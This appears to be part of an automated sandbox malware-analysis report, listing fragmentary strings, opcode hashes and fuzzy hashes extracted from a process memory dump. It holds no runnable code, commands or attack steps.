                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                      • API String ID: 0-3248090998
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !S$&$($)$)$+$0x$2Z$5$=$Aw$B!$DR$J$K$Q$S$S$V$V$Xd$Y$[$\j$a$a~$b$b$da$g$j$pB$s$K
                                                                                      • API String ID: 0-4275489075
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                      • API String ID: 0-1002149817
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                      • API String ID: 0-3236418099
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                      • API String ID: 0-3236418099
                                                                                      • Opcode ID: 8304ed62d903beac23a84ea8f6103efe8bb7b6df60275ed5bdaf3cce7c40783f
                                                                                      • Instruction ID: a2af0bc6c3ca8060456d9a1e898713fff4933992b5c66b7bffcad553f1e40ddd
                                                                                      • Opcode Fuzzy Hash: 8304ed62d903beac23a84ea8f6103efe8bb7b6df60275ed5bdaf3cce7c40783f
                                                                                      • Instruction Fuzzy Hash: EE41ECB0D003189FEB60DFA5C885BDEBBF9FF05748F1041999508AA241D7B55B89CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                      • API String ID: 0-392141074
                                                                                      • Opcode ID: 9abf1655f854d2ce284cae4749881e49761d1ac7e4b3ad601328f01391d28944
                                                                                      • Instruction ID: af69a741079b341fd0975e4609d3d165908e5c4d21b41a31e8a620a206ccb952
                                                                                      • Opcode Fuzzy Hash: 9abf1655f854d2ce284cae4749881e49761d1ac7e4b3ad601328f01391d28944
                                                                                      • Instruction Fuzzy Hash: BA7122B1E00218ABEB15EBA4CC41FEEB77DFF58704F04459DE609AA140EB7567488FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                                                      • API String ID: 0-2356907671
                                                                                      • Opcode ID: 952812548657e3addc6459049a13cdb6c38e62b87b819efe281c8f4c43574d83
                                                                                      • Instruction ID: 6eb5e362c6cf136663ad39206c6a446ad106c0f0002211baba9419ad8ef6ae88
                                                                                      • Opcode Fuzzy Hash: 952812548657e3addc6459049a13cdb6c38e62b87b819efe281c8f4c43574d83
                                                                                      • Instruction Fuzzy Hash: AA8150B2E003186BEB51FBA4CC85EEF77BCEF58708F044599A50AA6140EA756748CF71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                      • API String ID: 0-685823316
                                                                                      • Opcode ID: 469ec565c094bad94252c0c2dd7be8c746f4f3f9b8b592b256defeeee8d54098
                                                                                      • Instruction ID: 4c6073b5dd02e8b2212d8fc91301742d86a055b5fcfc719a97e7eee1ed3eddf3
                                                                                      • Opcode Fuzzy Hash: 469ec565c094bad94252c0c2dd7be8c746f4f3f9b8b592b256defeeee8d54098
                                                                                      • Instruction Fuzzy Hash: 262161B5D41218AAEF50DFD0DC45BEEB7B9EF08704F048159E608BA180DBB52648CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                      • API String ID: 0-2304485323
                                                                                      • Opcode ID: 869e10abbdeceb13de7ddaeeaec22106c92cfdb53225ddfa277b4cc5580a5e80
                                                                                      • Instruction ID: c5422e2e8eb23f07672bfac3b589a421f78b286bc3935e198f682b4e04c31b56
                                                                                      • Opcode Fuzzy Hash: 869e10abbdeceb13de7ddaeeaec22106c92cfdb53225ddfa277b4cc5580a5e80
                                                                                      • Instruction Fuzzy Hash: 71D1C8B2A01304AFEB50EBE4CC81FEEB7B8FF58308F14491DE5499A144EB79A544CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                      • API String ID: 0-2304485323
                                                                                      • Opcode ID: 1e14bb6b656b4e247f7db45ffe12e9ec6d2c498f79153ed34549d1f9e66eefa2
                                                                                      • Instruction ID: 06d919d2d004babeaf50d9ab21fe9393f3c113bb638e40f1c9268e2bd8a879f9
                                                                                      • Opcode Fuzzy Hash: 1e14bb6b656b4e247f7db45ffe12e9ec6d2c498f79153ed34549d1f9e66eefa2
                                                                                      • Instruction Fuzzy Hash: 1481B6B1A01304AFEB50EFA4C881BEEB7B9FF58308F14451DE509AB240EB79A545CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: *$4$4$:$B$J$[$g$w
                                                                                      • API String ID: 0-929430412
                                                                                      • Opcode ID: d4b509ba97d34350b6c445ef4db6dc56da083ce67fae79f9ced878b1620f3cdc
                                                                                      • Instruction ID: 277df851820799d552657db4ab7069c9f79baa697c258004f791407b218f9c6d
                                                                                      • Opcode Fuzzy Hash: d4b509ba97d34350b6c445ef4db6dc56da083ce67fae79f9ced878b1620f3cdc
                                                                                      • Instruction Fuzzy Hash: 6A11BB10D086CAD9DB12C7BC84187AEBFB15F27258F0882D9D4E52B2C2D2795706D7A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: L$S$\$a$c$e$l
                                                                                      • API String ID: 0-3322591375
                                                                                      • Opcode ID: d674f6451cde0e4f5239d380c6142ec49843396d235b6c39af4f8221591eea32
                                                                                      • Instruction ID: cf3e78f81af42fcaec28a2bf262cfc046b6a084bc12a3441db69f9f4ce84256a
                                                                                      • Opcode Fuzzy Hash: d674f6451cde0e4f5239d380c6142ec49843396d235b6c39af4f8221591eea32
                                                                                      • Instruction Fuzzy Hash: 48416BB2D10218ABDF50EFA4DC44EEEB7F8FF48714F01469AD90DAB210EB7165458BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F$P$T$f$r$x
                                                                                      • API String ID: 0-2523166886
                                                                                      • Opcode ID: a6be902b3c75202715d456ccf2431012c740054d860f66837447b8e1990b6ac6
                                                                                      • Instruction ID: 00ad52bc4ed36e08e3ab3ff6b94915251aa1c51d05cd22e6d81f29958f73beec
                                                                                      • Opcode Fuzzy Hash: a6be902b3c75202715d456ccf2431012c740054d860f66837447b8e1990b6ac6
                                                                                      • Instruction Fuzzy Hash: 6251C871701304ABEB30EFA9CC44BAAB7F8FF00748F00459AA9499A5A0D7B5B544CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: F$P$T$f$r$x
                                                                                      • API String ID: 0-2523166886
                                                                                      • Opcode ID: a242118a132c0bd492f2fd17f7b2d0ef56f0347bcea2c6b7cbbaab21abe10785
                                                                                      • Instruction ID: f25be78f409057f16fd7d2fb2d32908aac5a3c0e68b1b62a5c59d6369270b560
                                                                                      • Opcode Fuzzy Hash: a242118a132c0bd492f2fd17f7b2d0ef56f0347bcea2c6b7cbbaab21abe10785
                                                                                      • Instruction Fuzzy Hash: 7901B971E102086BDB10EF99D8056EE7BB8FF41358F40419AEC086B210E7B6694D8BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $i$l$o$u
                                                                                      • API String ID: 0-2051669658
                                                                                      • Opcode ID: a5dccdbd15732118c35b309e3f7efe2aabbfe6d4b2a729431e530e7d6dfc1f58
                                                                                      • Instruction ID: 02f966a527e29bd8f2d5af58c2cb419074db7e229dc9a67b4a91206c341674d3
                                                                                      • Opcode Fuzzy Hash: a5dccdbd15732118c35b309e3f7efe2aabbfe6d4b2a729431e530e7d6dfc1f58
                                                                                      • Instruction Fuzzy Hash: F46141B5A00304AFDB24DBA4CC80FEFB7FDAB48714F144599E919A7250EB35BA45CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $i$l$o$u
                                                                                      • API String ID: 0-2051669658
                                                                                      • Opcode ID: 765cdef00625a3fca87418c4ec0e2a0e25ae59bb050225e52134b21eb4e06adb
                                                                                      • Instruction ID: d0d30d1b6bd822ef6712de90c0ec0c80b2a87b9a9b2b56c8a4ccd9e6ecff85c8
                                                                                      • Opcode Fuzzy Hash: 765cdef00625a3fca87418c4ec0e2a0e25ae59bb050225e52134b21eb4e06adb
                                                                                      • Instruction Fuzzy Hash: 07411BB1A00308AFDB20DFA4CC84FEEBBF9EB48714F104559E919A7250DB75AA45CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4$9$M$O$y
                                                                                      • API String ID: 0-1709836335
                                                                                      • Opcode ID: 4e99f22e12867ce6852309ce1e02e2273d376f8c983dd6efded3245648efb3bc
                                                                                      • Instruction ID: 4e56eaa8d5fbb6feaf1e284e5e888487d07b41cab3c8582f4bda5eb0d40f7903
                                                                                      • Opcode Fuzzy Hash: 4e99f22e12867ce6852309ce1e02e2273d376f8c983dd6efded3245648efb3bc
                                                                                      • Instruction Fuzzy Hash: 213114B1E10119BBEB10EB94DD41FFE77B8EF44308F008199E905AB240E776AA458BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      • Opcode ID: f34e851c983612427d6b355b4398a02a18ee5edd43b831caba5c2c1a807e861d
                                                                                      • Instruction ID: cc798003d60e8b7446224ef954f1180773d1f35a558684451d294045d21be7fb
                                                                                      • Opcode Fuzzy Hash: f34e851c983612427d6b355b4398a02a18ee5edd43b831caba5c2c1a807e861d
                                                                                      • Instruction Fuzzy Hash: 45B10EB5A00704AFDB24DBA4CC85FEFB7F9AF88704F104558FA19A7240DA74AA45CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$h$o
                                                                                      • API String ID: 0-3662636641
                                                                                      • Opcode ID: 5c74a7a926895c2270d8489b63ed91a689799dffb257edd9b4777449277fbc8a
                                                                                      • Instruction ID: 1553db4e9b639f8c48ad70ccbaaddca9a564635b723e57656ea844bdbb0d6810
                                                                                      • Opcode Fuzzy Hash: 5c74a7a926895c2270d8489b63ed91a689799dffb257edd9b4777449277fbc8a
                                                                                      • Instruction Fuzzy Hash: 0F7140B2A002187EEF65EB94CC85FEE73BCEF49704F0045D9A54966150EE746B848FB2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                      • API String ID: 0-2877786613
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$h$o
                                                                                      • API String ID: 0-3662636641
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $e$k$o
                                                                                      • API String ID: 0-3624523832
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04CA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_4ca0000_aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #$0$age=$max-
                                                                                      • API String ID: 0-2455145082
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%